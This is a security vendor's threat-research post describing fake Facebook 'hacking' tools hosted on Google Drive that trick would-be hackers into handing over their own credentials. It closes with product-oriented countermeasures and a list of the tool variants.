CaaS in the Cloud
Cloud Threat Labs (CTL), now part of Symantec Corporation, discovered that hackers are using Google Drive to host Facebook Phishing and Account hijacking tools.
Fake Facebook Hacking Tools Hosted on Google Drive for Stealing Credentials
Aditya K Sood and Rehan Jalil
Elastica Cloud Threat Labs, a research group of Blue Coat
now part of Symantec Corporation
The Crimeware-as-a-Service (CaaS) model gives cybercriminals a way to automate their unauthorized and often illegal activities on the Internet. And they can earn a significant amount of money very quickly using CaaS. Recently, Cloud Threat Labs (CTL), now part of Symantec Corporation discovered that hackers are using Google Drive to host Facebook Phishing and Account hijacking tools. Multiple versions of these tools were found on Google Drive.
Analysis: Generally, online scamming and phishing tools are used broadly to harvest credentials from target entities. In this case study, we will take a look into the “Facebook Hacking” tool, including multiple variants that are used by unauthorized actors to steal end-user credentials for nefarious purposes. In reality, this is not a real hacking tool that exploits vulnerabilities in Facebook, rather it’s an online scamming tool that is sold as a service under the CaaS model exploiting novice individuals attempting to hack another person’s Facebook account.
Note: In this research, we have looked into multiple scamming and phishing tools hosted on Google Drive that enable cyber criminals to target users and convince them to divulge their Facebook account credentials through social engineering attacks by offering them the ability to hack into the Facebook accounts of other users. These attacks are legitimate because many enterprise users also use Facebook (please check for additional toolsets in the Appendices section). The working model can be different but the end result is either stolen credentials or monetary theft.
There are number of points to consider before we discuss the case study:
- The attacker actually abuses the web publishing functionality provided by the cloud storage services. In this case, Google Drive.
- The attacker can use previously stolen credentials for cloud storage services and use the compromised accounts to host the tool. In addition, the attacker can also use free accounts provided by the cloud storage providers and abuse them for unauthorized activities.
- The associated tool does not exploit any vulnerability in the Facebook OSN, rather it conducts a social engineering attack to fool users into thinking they can hack into other users’ Facebook accounts by providing specific information as requested by the tool. We will discuss the complete flow in a bit.
- The attackers can successfully steal the users’ Facebook account credentials through this social engineering attack.
- The stolen Facebook accounts’ credentials can be later used for multiple attacks such as drive-by download attacks through malicious link sharing, malvertisements, stealing information from the groups, and others.
- The attacker can sell the stolen credentials in the underground cybercrime market for monetary benefit, which is main purpose of the CaaS model.
Let’s analyze one variant of the tool:
- When the user receives the Google Drive link and opens it, the following web page is displayed.
- The tool presents the following options (verbatim) to the user “Step 1. Login in You Account” and “Step 2. Put You Friend Link and Click Hack Account!.”
- The tool asks the user to first log in to his/her account before the process of hacking another user’s account begins. When they click the “Click Here To Login” button, the tool generates an inline popup and asks for the user’s Facebook account password.
- When the user supplies the account credentials, the information is transmitted back to the attacker-controlled domain, which is in this case is a subdomain hosted on the “altervista.org” site. It means the user’s Facebook account credentials have been stolen by the attacker on the fly.
- Once the credentials have been supplied, the user is shown the 404 page as shown below and the browser is redirected back to the main page.
- When the user goes to provide the profile information in the Facebook URL, the tool does nothing except to show the false “Verifying” link, which never provides a result. This is a simple technique to trick the user into believing the tool is working to gain access to the targeted profile on Facebook.
We have found multiple variants of these types of tools as highlighted in the Appendix section. We won’t go into analysis of individual tools but the primary purposes of these tools are the same.
The following are some typical countermeasures:
- Gain granular visibility into the cloud application traffic as well as network traffic. Blue Coat’s Elastica CloudSOC™ provides complete visibility into cloud application traffic and how users interact with these apps.
Scan files sitting in Google Drive via APIs and files shared via Google URLs.
Blue Coat advanced malware analysis engine, along with CloudSOC, provides the capability to scan all files in cloud applications and shared via links.
Enforce security policy for both cloud and non-cloud apps
ProxySG and advanced malware analysis integration with Elastica CloudSOC provides enterprise users with complete cloud app visibility and data security policy enforcement features, which can eliminate or mitigate the impact of these types of exploits.
Appendix 1: Face Off Facebook Hacker 17.1 and 17.2
Appendix 2: Skull Facebook Hacker 18.1
Appendix 3: Scorpion Facebook Hacker 16.2
Appendix 4: Scorpion Facebook Bot 6.1
Appendix 5: Face Off Facebook Credits Generator 13.1
Appendix 6: Cheat World Facebook Likes Online Generator